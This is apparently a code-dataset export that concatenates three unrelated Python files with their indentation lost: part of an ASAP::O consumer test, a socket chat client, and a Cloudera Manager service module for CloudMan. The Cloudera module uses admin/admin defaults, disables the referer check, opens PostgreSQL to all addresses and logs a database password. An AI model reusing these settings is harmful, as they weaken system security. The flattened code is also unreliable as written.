_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "2", "get next after resend")
# messages
messages = consumer.query_messages("meta.test = 10")
assert_eq(len(messages), 5, "size of query answer 1")
for message in messages:
assert_usermetadata(message, "query_messages")
messages = consumer.query_messages("meta.test = 10 AND name='1'")
assert_eq(len(messages), 1, "size of query answer 2 ")
for message in messages:
assert_usermetadata(message, "query_messages")
messages = consumer.query_messages("meta.test = 11")
assert_eq(len(messages), 0, "size of query answer 3 ")
try:
messages = consumer.query_messages("bla")
except:
pass
else:
exit_on_noerr("wrong query")
# metadata
bt_meta = consumer.get_beamtime_meta()
assert_eq(bt_meta['data'], 'test_bt', "beamtime meta ")
st_meta = consumer.get_stream_meta("test")
assert_eq(st_meta['data'], 'test_st', "stream meta ")
try:
consumer.get_stream_meta("notexist")
except asapo_consumer.AsapoNoDataError as err:
print(err)
pass
else:
exit_on_noerr("should be wrong input on non existing stream")
# delete stream
consumer.delete_stream(stream='default')
try:
consumer.delete_stream()
except asapo_consumer.AsapoWrongInputError as err:
print(err)
pass
else:
exit_on_noerr("should be AsapoWrongInputError on delete stream second time ")
consumer.delete_stream(error_on_not_exist = False)
# constructors
consumer = asapo_consumer.create_consumer("bla", path, True, beamtime, "", token, 1000)
try:
consumer.get_last(meta_only=True)
except asapo_consumer.AsapoUnavailableServiceError as err:
print(err)
pass
else:
exit_on_noerr("AsapoconsumerServersNotFound")
try:
asapo_consumer.create_consumer("", "", True, "", "", "", 1000)
except asapo_consumer.AsapoWrongInputError as err:
print(err)
pass
else:
exit_on_noerr("should be AsapoWrongInputError")
# interrupt
thread_res = 0
def long_call(consumer):
global thread_res
try:
consumer.get_last(meta_only=True)
thread_res = 1
except asapo_consumer.AsapoInterruptedTransactionError as err:
global res
print(err)
thread_res = 2
pass
else:
print("interrupt test failed")
thread_res = 3
pass
consumer = asapo_consumer.create_consumer("bla", path, True, beamtime, "", token, 60000)
t = Thread(target = long_call, args = (consumer,) )
t.start()
time.sleep(1)
consumer.interrupt_current_operation()
t.join()
assert_eq(thread_res, 2, "long call res")
def check_dataset(consumer, group_id):
res = consumer.get_next_dataset(group_id)
assert_eq(res['id'], 1, "get_next_dataset1")
assert_metaname(res['content'][0], "1_1", "get nextdataset1 name1")
assert_metaname(res['content'][1], "1_2", "get nextdataset1 name2")
assert_usermetadata(res['content'][0], "get nextdataset1 meta")
consumer.set_timeout(1000)
data = consumer.retrieve_data(res['content'][0])
assert_eq(data.tostring().decode("utf-8"), "hello1", "retrieve_data from dataset data")
res = consumer.get_next_dataset(group_id)
assert_eq(res['id'], 2, "get_next_dataset2")
assert_metaname(res['content'][0], "2_1", "get nextdataset2 name1")
res = consumer.get_last_dataset()
assert_eq(res['id'], 10, "get_last_dataset1")
assert_eq(res['expected_size'], 3, "get_last_dataset1 size ")
assert_metaname(res['content'][2], "10_3", "get get_last_dataset1 name3")
# get last dataset in group
res = consumer.get_last_dataset(group_id=group_id)
assert_eq(res['id'], 10, "get_last_dataset in group")
try:
consumer.get_last_dataset(group_id=group_id)
except asapo_consumer.AsapoEndOfStreamError:
pass
else:
exit_on_noerr("get last dataset in group error second time")
res = consumer.get_next_dataset(group_id)
assert_eq(res['id'], 3, "get_next_dataset3")
res = consumer.get_dataset_by_id(8)
assert_eq(res['id'], 8, "get_dataset_by_id1 id")
assert_metaname(res['content'][2], "8_3", "get get_dataset_by_id1 name3")
size = consumer.get_current_dataset_count()
assert_eq(size, 10, "get_current_dataset_count")
# incomplete datesets without min_size given
try:
consumer.get_next_dataset(group_id, stream = "incomplete")
except asapo_consumer.AsapoPartialDataError as err:
assert_eq(err.partial_data['expected_size'], 3, "get_next_dataset incomplete expected size")
assert_eq(err.partial_data['id'], 1, "get_next_dataset incomplete id")
assert_eq(err.partial_data['content'][0]['name'], '1_1', "get_next_dataset content 1")
assert_eq(err.partial_data['content'][1]['name'], '1_2', "get_next_dataset content 2")
pass
else:
exit_on_noerr("get_next_dataset incomplete err")
try:
consumer.get_dataset_by_id(2, stream = "incomplete")
except asapo_consumer.AsapoPartialDataError as err:
assert_eq(err.partial_data['expected_size'], 3, "get_next_dataset incomplete expected size")
assert_eq(err.partial_data['id'], 2, "get_next_dataset incomplete id")
assert_eq(err.partial_data['content'][0]['name'], '2_1', "get_next_dataset content 1")
assert_eq(err.partial_data['content'][1]['name'], '2_2', "get_next_dataset content 2")
pass
else:
exit_on_noerr("get_next_dataset incomplete err")
try:
consumer.get_last_dataset(stream = "incomplete")
except asapo_consumer.AsapoEndOfStreamError as err:
pass
else:
exit_on_noerr("get_last_dataset incomplete err")
# incomplete with min_size given
res = consumer.get_next_dataset(group_id, min_size=2, stream = "incomplete")
assert_eq(res['id'], 2, "get_next_dataset incomplete with minsize")
res = consumer.get_last_dataset(min_size=2, stream = "incomplete")
assert_eq(res['id'], 5, "get_last_dataset incomplete with minsize")
res = consumer.get_dataset_by_id(2, min_size=1, stream = "incomplete")
assert_eq(res['id'], 2, "get_dataset_by_id incomplete with minsize")
size = consumer.get_current_dataset_count(stream = "incomplete", include_incomplete = False)
assert_eq(size, 0, "get_current_dataset_count excluding incomplete")
size = consumer.get_current_dataset_count(stream = "incomplete", include_incomplete = True)
assert_eq(size, 5, "get_current_dataset_count including incomplete")
size = consumer.get_current_size(stream = "incomplete") # should work as well
assert_eq(size, 5, "get_current_size for datasets")
source, path, beamtime, token, mode = sys.argv[1:]
consumer = asapo_consumer.create_consumer(source, path, True, beamtime, "", token, 60000)
consumer_fts = asapo_consumer.create_consumer(source, path, False, beamtime, "", token, 60000)
group_id = consumer.generate_group_id()
group_id_fts = consumer_fts.generate_group_id()
if mode == "single":
check_single(consumer, group_id)
check_file_transfer_service(consumer_fts, group_id_fts)
if mode == "datasets":
check_dataset(consumer, group_id)
print("tests done")
sys.exit(0)
|
Client.py
|
# coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee kongyeeku@163.com #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
import socket, threading, CrazyitProtocol, os
from tkinter import simpledialog
import time
SERVER_PORT = 30000
# 定义一个读取键盘输入,并向网络发送的函数
def read_send(s):
# 采用死循环不断地读取键盘输入
while True:
line = input('')
if line is None or line == 'exit':
break
# 如果发送的信息中有冒号,且以//开头,则认为想发送私聊信息
if ":" in line and line.startswith("//"):
line = line[2:]
s.send((CrazyitProtocol.PRIVATE_ROUND
+ line.split(":")[0] + CrazyitProtocol.SPLIT_SIGN
+ line.split(":")[1] + CrazyitProtocol.PRIVATE_ROUND).encode('utf-8'))
else:
s.send((CrazyitProtocol.MSG_ROUND + line
+ CrazyitProtocol.MSG_ROUND).encode('utf-8'))
# 创建socket对象
s = socket.socket()
try:
# 连接远程主机
s.connect(('192.168.1.88', SERVER_PORT))
tip = ""
# 采用循环不断地弹出对话框要求输入用户名
while True:
user_name = input(tip + '输入用户名:\n') # ①
# 在用户输入的用户名前后增加协议字符串后发送
s.send((CrazyitProtocol.USER_ROUND + user_name
+ CrazyitProtocol.USER_ROUND).encode('utf-8'))
time.sleep(0.2)
# 读取服务器端的响应
result = s.recv(2048).decode('utf-8')
if result is not None and result != '':
# 如果用户名重复,则开始下次循环
if result == CrazyitProtocol.NAME_REP:
tip = "用户名重复!请重新"
continue
# 如果服务器端返回登录成功,则结束循环
if result == CrazyitProtocol.LOGIN_SUCCESS:
break
# 捕获到异常,关闭网络资源,并退出该程序
except:
print("网络异常!请重新登录!")
s.close()
os._exit(1)
def client_target(s):
try:
# 不断地从socket中读取数据,并将这些数据打印输出
while True:
line = s.recv(2048).decode('utf-8')
if line is not None:
print(line)
# 本例仅打印了从服务器端读到的内容。实际上,此处的情况可以更复杂:如
# 果希望客户端能看到聊天室的用户列表,则可以让服务器端在每次有用户登
# 录、用户退出时,将所有的用户列表信息都向客户端发送一遍。为了区分服
# 务器端发送的是聊天信息,还是用户列表,服务器端也应该在要发送的信息
# 前、后都添加一定的协议字符串,客户端则根据协议字符串的不同而进行不
# 同的处理!
# 更复杂的情况:
# 如果两端进行游戏,则还有可能发送游戏信息,例如两端进行五子棋游戏,
# 则需要发送下棋坐标信息等,服务器端同样在这些下棋坐标信息前、后添加
# 协议字符串后再发送,客户端就可以根据该信息知道对手的下棋坐标。
# 使用finally块来关闭该线程对应的socket
finally:
s.close()
# 启动客户端线程
threading.Thread(target=client_target, args=(s,)).start()
read_send(s)
|
clouderamanager.py
|
import os
import time
import threading
# import subprocess
import socket
# import re
# Ansible <v2 has a security vulnerability and v2 has a different API
# Disabling Cloudera manager as don't believe it's used by anyone any more.
# from ansible.runner import Runner
# from ansible.inventory import Inventory
from cm_api.api_client import ApiResource # Cloudera Manager API
from cm_api.api_client import ApiException
# from cm_api.endpoints.clusters import ApiCluster
# from cm_api.endpoints.clusters import create_cluster
# from cm_api.endpoints.parcels import ApiParcel
from cm_api.endpoints.parcels import get_parcel
# from cm_api.endpoints.cms import ClouderaManager
from cm_api.endpoints.services import ApiServiceSetupInfo
# from cm_api.endpoints.services import ApiService, create_service
# from cm_api.endpoints.types import ApiCommand, ApiRoleConfigGroupRef
# from cm_api.endpoints.role_config_groups import get_role_config_group
# from cm_api.endpoints.role_config_groups import ApiRoleConfigGroup
# from cm_api.endpoints.roles import ApiRole
from time import sleep
from cm.util import misc
import cm.util.paths as paths
from cm.services import ServiceRole
from cm.services import service_states
from cm.services.apps import ApplicationService
import logging
log = logging.getLogger('cloudman')
NUM_START_ATTEMPTS = 2 # Number of times we attempt to auto-restart the service
class ClouderaManagerService(ApplicationService):
def __init__(self, app):
super(ClouderaManagerService, self).__init__(app)
self.svc_roles = [ServiceRole.CLOUDERA_MANAGER]
self.name = ServiceRole.to_string(ServiceRole.CLOUDERA_MANAGER)
self.dependencies = []
self.remaining_start_attempts = NUM_START_ATTEMPTS
self.db_pwd = misc.random_string_generator()
# Indicate if the web server has been configured and started
self.started = False
self.cm_port = 7180
# Default cluster configuration
# TODO - read local cloud host name!
# self.cm_host = socket.gethostname()
self.cm_host = self.app.cloud_interface.get_local_hostname()
self.host_list = []
self.cluster_name = "Cluster 1"
self.cdh_version = "CDH5"
self.cdh_version_number = "5"
self.cm_username = "admin"
self.cm_password = "admin"
self.mgmt_service_name = "ManagementService"
self.host_username = "ubuntu"
self.host_password = self.app.config.get('password')
self.cm_repo_url = None
self.service_types_and_names = {
"HDFS": "HDFS",
"YARN": "YARN"
}
@property
def cm_api_resource(self):
ar = None
try:
ar = ApiResource(self.cm_host, self.cm_port,
self.cm_username, self.cm_password)
ar.echo('Authenticated') # Issue a sample request to test the conn
except ApiException, aexc:
if aexc.code == 401:
log.debug("Changing default API username to {0}".format(self.cm_username))
self.cm_username = self.host_username
self.cm_password = self.host_password
ar = ApiResource(self.cm_host, self.cm_port,
self.cm_username, self.cm_password)
else:
log.error("Api Exception connecting to ClouderaManager: {0}".format(aexc))
except Exception, exc:
log.debug("Exception connecting to ClouderaManager: {0}".format(exc))
return ar
@property
def cm_manager(self):
if self.cm_api_resource:
return self.cm_api_resource.get_cloudera_manager()
else:
log.debug("No cm_api_resource; cannot get cm_manager")
return None
def start(self):
"""
Start Cloudera Manager web server.
"""
log.debug("Starting Cloudera Manager service")
self.state = service_states.STARTING
misc.run('/sbin/sysctl vm.swappiness=0') # Recommended by Cloudera
threading.Thread(target=self.__start).start()
def __start(self):
"""
Start all the service components.
Intended to be called in a dedicated thread.
"""
try:
self.configure_db()
self.start_webserver()
self.set_default_user()
# self.create_cluster()
# self.setup_cluster()
self.remaining_start_attempts -= 1
except Exception, exc:
log.error("Exception creating a cluster: {0}".format(exc))
def remove(self, synchronous=False):
"""
Stop the Cloudera Manager web server.
"""
log.info("Stopping Cloudera Manager service")
super(ClouderaManagerService, self).remove(synchronous)
self.state = service_states.SHUTTING_DOWN
try:
if self.cm_api_resource:
cluster = self.cm_api_resource.get_cluster(self.cluster_name)
cluster.stop()
except Exception, exc:
log.error("Exception stopping cluster {0}: {1}".format(self.cluster_name, exc))
if misc.run("service cloudera-scm-server stop"):
self.state = service_states.SHUT_DOWN
def configure_db(self):
"""
Add the necessary tables to the default PostgreSQL server running on the
host and prepare the necessary roles and databases.
"""
# Update psql settings
pg_conf = paths.P_PG_CONF
lif = ["listen_addresses = '*'",
"shared_buffers = 256MB",
"wal_buffers = 8MB",
"checkpoint_segments = 16",
"checkpoint_completion_target = 0.9"]
for l in lif:
log.debug("Updating PostgreSQL conf file {0} setting: {1}".format(pg_conf, l))
regexp = ' '.join(l.split(' ')[:2])
log.warning("(1) Configuring DB has been disabled!")
# Requires upgrade to Ansible v2
# try:
# Runner(inventory=Inventory(['localhost']),
# transport='local',
# become=True,
# become_user='postgres',
# module_name="lineinfile",
# module_args=('dest={0} backup=yes line="{1}" owner=postgres regexp="{2}"'
# .format(pg_conf, l, regexp))
# ).run()
# except Exception, e:
# log.error("Exception updating psql conf {0}: {1}".format(l, e))
# Restart psql
misc.run("service postgresql restart")
# Add required roles to the main Postgres server
roles = ['scm', 'amon', 'rman', 'hive']
for role in roles:
log.debug("Adding PostgreSQL role {0} (with pwd: {1})".format(role,
self.db_pwd))
log.warning("(2) Configuring DB has been disabled!")
# Requires upgrade to Ansible v2
# try:
# Runner(inventory=Inventory(['localhost']),
# transport='local',
# become=True,
# become_user='postgres',
# module_name="postgresql_user",
# module_args=("name={0} role_attr_flags=LOGIN password={1}"
# .format(role, self.db_pwd))
# ).run()
# except Exception, e:
# log.error("Exception creating psql role {0}: {1}".format(role, e))
# Create required databases
databases = ['scm', 'amon', 'rman', 'metastore']
for db in databases:
owner = db
if db == 'metastore':
owner = 'hive'
log.debug("Creating database {0} with owner {1}".format(db, owner))
log.warning("(3) Configuring DB has been disabled!")
# Requires upgrade to Ansible v2
# try:
# r = Runner(inventory=Inventory(['localhost']),
# transport='local',
# become=True,
# become_user='postgres',
# module_name="postgresql_db",
# module_args=("name={0} owner={1} encoding='UTF-8'"
# .format(db, owner))
# ).run()
# if r.get('contacted', {}).get('localhost', {}).get('failed'):
# msg = r.get('contacted', {}).get('localhost', {}).get('msg', 'N/A')
# log.error("Creating the database filed: {0}".format(msg))
# except Exception, e:
# log.error("Exception creating database {0}: {1}".format(db, e))
# Alter one of the DBs
sql_cmds = [
"ALTER DATABASE metastore SET standard_conforming_strings = off"
]
for sql_cmd in sql_cmds:
misc.run_psql_command(sql_cmd, 'postgres', self.app.path_resolver.psql_cmd, 5432)
# Prepare the scm database
cmd = ("/usr/share/cmf/schema/scm_prepare_database.sh -h localhost postgresql scm scm {0}"
.format(self.db_pwd))
misc.run(cmd)
# Make sure we have a clean DB env
f = '/etc/cloudera-scm-server/db.mgmt.properties'
if os.path.exists(f):
log.debug("Deleting file {0}".format(f))
os.remove(f)
def start_webserver(self):
"""
Start the Cloudera Manager web server (defaults to port 7180)
"""
def _disable_referer_check():
log.debug("Disabling refered check")
config = {u'REFERER_CHECK': u'false',
u'REMOTE_PARCEL_REPO_URLS': u'http://archive.cloudera.com/cdh5/parcels/5.4.1/'}
done = False
self.state = service_states.CONFIGURING
while not done:
try:
self.cm_manager.update_config(config)
log.debug("Succesfully disabled referer check")
done = True
self.started = True
except Exception:
log.debug("Still have not disabled referer check... ")
time.sleep(15)
if self.state in [service_states.SHUTTING_DOWN,
service_states.SHUT_DOWN,
service_states.ERROR]:
log.debug("Service state {0}; not configuring ClouderaManager."
.format(self.state))
done = True
if misc.run("service cloudera-scm-server start"):
_disable_referer_check()
def set_default_user(self):
"""
Replace the default 'admin' user with a default system one (generally
``ubuntu``) and it's password.
"""
host_username_exists = default_username_exists = False
existing_users = self.cm_api_resource.get_all_users().to_json_dict().get('items', [])
for existing_user in existing_users:
if existing_user.get('name', None) == self.host_username:
host_username_exists = True
if existing_user.get('name', None) == 'admin':
default_username_exists = True
if not host_username_exists:
log.debug("Setting default user to {0}".format(self.host_username))
# Create new admin user (use 'ubuntu' and password provided at cloudman startup)
self.cm_api_resource.create_user(self.host_username, self.host_password, ['ROLE_ADMIN'])
else:
log.debug("Admin user {0} exists.".format(self.host_username))
if default_username_exists:
# Delete the default 'admin' user
old_admin = self.cm_username
self.cm_username = self.host_username
self.cm_password = self.host_password
log.debug("Deleting the old default user 'admin'...")
self.cm_api_resource.delete_user(old_admin)
def init_cluster(api, self):
"""
Create a new cluster and add hosts to it.
"""
cluster = api.create_cluster(self.cluster_name, self.cdh_version_number)
# Add the CM host to the list of hosts to add in the cluster so it can run the management services
all_hosts = list(self.host_list)
all_hosts.append(self.cm_host)
cluster.add_hosts(all_hosts)
return cluster
def deploy_management(manager, self):
"""
Create and deploy new management service
"""
MGMT_SERVICE_CONFIG = {
'zookeeper_datadir_autocreate': 'true',
}
MGMT_ROLE_CONFIG = {
'quorumPort': 2888,
}
AMON_ROLENAME = "ACTIVITYMONITOR"
AMON_ROLE_CONFIG = {
'firehose_database_host': self.cm_host + ":7432",
'firehose_database_user': 'amon',
'firehose_database_password': self.db_pwd,
'firehose_database_type': 'postgresql',
'firehose_database_name': 'amon',
'firehose_heapsize': '215964392',
}
APUB_ROLENAME = "ALERTPUBLISHER"
APUB_ROLE_CONFIG = {}
ESERV_ROLENAME = "EVENTSERVER"
ESERV_ROLE_CONFIG = {
'event_server_heapsize': '215964392'
}
HMON_ROLENAME = "HOSTMONITOR"
HMON_ROLE_CONFIG = {}
SMON_ROLENAME = "SERVICEMONITOR"
SMON_ROLE_CONFIG = {}
NAV_ROLENAME = "NAVIGATOR"
NAV_ROLE_CONFIG = {
'navigator_database_host': self.cm_host + ":7432",
'navigator_database_user': 'nav',
'navigator_database_password': self.db_pwd,
'navigator_database_type': 'postgresql',
'navigator_database_name': 'nav',
'navigator_heapsize': '215964392',
}
NAVMS_ROLENAME = "NAVIGATORMETADATASERVER"
NAVMS_ROLE_CONFIG = {}
RMAN_ROLENAME = "REPORTMANAGER"
RMAN_ROLE_CONFIG = {
'headlamp_database_host': self.cm_host + ":7432",
'headlamp_database_user': 'rman',
'headlamp_database_password': self.db_pwd,
'headlamp_database_type': 'postgresql',
'headlamp_database_name': 'rman',
'headlamp_heapsize': '215964392',
}
mgmt = manager.create_mgmt_service(ApiServiceSetupInfo())
# create roles. Note that host id may be different from host name (especially in CM 5). Look it it up in /api/v5/hosts
mgmt.create_role(amon_role_name + "-1", "ACTIVITYMONITOR", CM_HOST)
mgmt.create_role(apub_role_name + "-1", "ALERTPUBLISHER", CM_HOST)
mgmt.create_role(eserv_role_name + "-1", "EVENTSERVER", CM_HOST)
mgmt.create_role(hmon_role_name + "-1", "HOSTMONITOR", CM_HOST)
mgmt.create_role(smon_role_name + "-1", "SERVICEMONITOR", CM_HOST)
# mgmt.create_role(nav_role_name + "-1", "NAVIGATOR", CM_HOST)
# mgmt.create_role(navms_role_name + "-1", "NAVIGATORMETADATASERVER", CM_HOST)
# mgmt.create_role(rman_role_name + "-1", "REPORTSMANAGER", CM_HOST)
# now configure each role
for group in mgmt.get_all_role_config_groups():
if group.roleType == "ACTIVITYMONITOR":
group.update_config(amon_role_conf)
elif group.roleType == "ALERTPUBLISHER":
group.update_config(apub_role_conf)
elif group.roleType == "EVENTSERVER":
group.update_config(eserv_role_conf)
elif group.roleType == "HOSTMONITOR":
group.update_config(hmon_role_conf)
elif group.roleType == "SERVICEMONITOR":
group.update_config(smon_role_conf)
# elif group.roleType == "NAVIGATOR":
# group.update_config(nav_role_conf)
# elif group.roleType == "NAVIGATORMETADATASERVER":
# group.update_config(navms_role_conf)
# elif group.roleType == "REPORTSMANAGER":
# group.update_config(rman_role_conf)
# now start the management service
mgmt.start().wait()
return mgmt
def create_cluster(self):
"""
Create a cluster and Cloudera Manager Service on master host
"""
log.info("Creating Cloudera cluster: '{0}'. Please wait...".format(self.cluster_name))
### CM Definitions ###
CM_CONFIG = {
'TSQUERY_STREAMS_LIMIT' : 1000,
}
### Create and deploy new cluster ##
ar = self.cm_api_resource
manager = self.cm_manager
manager.update_config(CM_CONFIG)
log.info("Connected to CM host on " + self.cm_host + " and updated CM configuration")
## Initialize a cluster ##
cluster = self.init_cluster(ar)
log.info("Initialized cluster " + self.cluster_name + " which uses CDH version " + self.cdh_version_number)
## Deploy management service ##
deploy_management(manager)
log.info("Deployed CM management service " + self.mgmt_service_name + " to run on " + self.cm_host)
# install hosts on this CM instance
cmd = self.cm_manager.host_install(self.host_username, self.host_list,
password=self.host_password,
cm_repo_url=self.cm_repo_url)
log.debug("Installing hosts. This might take a while...")
while cmd.success is None:
sleep(5)
cmd = cmd.fetch()
if cmd.success is not True:
log.error("Adding hosts to Cloudera Manager failed: {0}".format(cmd.resultMessage))
log.debug("Host added to Cloudera Manager")
# first auto-assign roles and auto-configure the CM service
self.cm_manager.auto_assign_roles()
self.cm_manager.auto_configure()
# create a cluster on that instance
cluster = self.cm_api_resource.create_cluster(self.cluster_name, self.cdh_version)
log.debug("Cloudera cluster: {0} created".format(self.cluster_name))
# add all hosts on the cluster
cluster.add_hosts(self.host_list)
cluster = self.cm_api_resource.get_cluster(self.cluster_name)
# get and list all available parcels
parcels_list = []
log.debug("Installing parcels...")
for p in cluster.get_all_parcels():
print '\t' + p.product + ' ' + p.version
if p.version.startswith(self.cdh_version_number) and p.product == "CDH":
parcels_list.append(p)
if len(parcels_list) == 0:
log.error("No {0} parcel found!".format(self.cdh_version))
cdh_parcel = parcels_list[0]
for p in parcels_list:
if p.version > cdh_parcel.version:
cdh_parcel = p
# download the parcel
log.debug("Starting parcel downloading...")
cmd = cdh_parcel.start_download()
if cmd.success is not True:
log.error("Parcel download failed!")
# make sure the download finishes
while cdh_parcel.stage != 'DOWNLOADED':
sleep(5)
cdh_parcel = get_parcel(self.cm_api_resource, cdh_parcel.product, cdh_parcel.version, self.cluster_name)
log.debug("Parcel: {0} {1} downloaded".format(cdh_parcel.product, cdh_parcel.version))
# distribute the parcel
log.debug("Distributing parcels...")
cmd = cdh_parcel.start_distribution()
if cmd.success is not True:
log.error("Parcel distribution failed!")
# make sure the distribution finishes
while cdh_parcel.stage != "DISTRIBUTED":
sleep(5)
cdh_parcel = get_parcel(self.cm_api_resource, cdh_parcel.product, cdh_parcel.version, self.cluster_name)
log.debug("Parcel: {0} {1} distributed".format(cdh_parcel.product, cdh_parcel.version))
# activate the parcel
log.debug("Activating parcels...")
cmd = cdh_parcel.activate()
if cmd.success is not True:
log.error("Parcel activation failed!")
# make sure the activation finishes
while cdh_parcel.stage != "ACTIVATED":
cdh_parcel = get_parcel(self.cm_api_resource, cdh_parcel.product, cdh_parcel.version, self.cluster_name)
log.debug("Parcel: {0} {1} activated".format(cdh_parcel.product, cdh_parcel.version))
# inspect hosts and print the result
log.debug("Inspecting hosts. This might take a few minutes")
cmd = self.cm_manager.inspect_hosts()
while cmd.success is None:
sleep(5)
cmd = cmd.fetch()
if cmd.success is not True:
log.error("Host inpsection failed!")
log.debug("Hosts successfully inspected:\n".format(cmd.resultMessage))
log.info("Cluster '{0}' installed".format(self.cluster_name))
def setup_cluster(self):
"""
Setup the default cluster and start basic services (HDFS, YARN and ZOOKEEPER)
"""
log.info("Setting up cluster services...")
# get the cluster
cluster = self.cm_api_resource.get_cluster(self.cluster_name)
# create all the services we want to add; we will only create one instance of each
for s in self.service_types_and_names.keys():
service_name = self.service_types_and_names[s]
cluster.create_service(service_name, s)
log.debug("Service: {0} added".format(service_name))
# auto-assign roles
cluster.auto_assign_roles()
cluster.auto_configure()
# start the management service
cm_service = self.cm_manager.get_service()
# create_CM_roles(master_node, cm_service)
cm_service.start().wait()
# execute the first run command
log.debug("Executing first run command. This might take a while...")
cmd = cluster.first_run()
while cmd.success is None:
sleep(5)
cmd = cmd.fetch()
if cmd.success is not True:
log.error("The first run command failed: {0}".format(cmd.resultMessage()))
log.info("First run successfully executed. Your cluster has been set up!")
def status(self):
"""
Check and update the status of the service.
"""
if self.state == service_states.UNSTARTED or \
self.state == service_states.STARTING or \
self.state == service_states.SHUTTING_DOWN or \
self.state == service_states.SHUT_DOWN or \
self.state == service_states.WAITING_FOR_USER_ACTION:
return
# Capture possible status messages from /etc/init.d/cloudera-scm-server
status_output = ['is dead and pid file exists',
'is dead and lock file exists',
'is not running',
'status is unknown']
svc_status = misc.getoutput('service cloudera-scm-server status', quiet=True)
for so in status_output:
if so in svc_status:
log.warning("Cloudera server not running: {0}.".format(so))
if self.remaining_start_attempts > 0:
log.debug("Resetting ClouderaManager service")
self.state = service_states.UNSTARTED
else:
log.error("Exceeded number of restart attempts; "
"ClouderaManager service in ERROR.")
self.state = service_states.ERROR
if not self.started:
pass
elif 'is running' in svc_status:
self.state = service_states.RUNNING
# Once the service gets running, reset the number of start attempts
self.remaining_start_attempts = NUM_START_ATTEMPTS
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.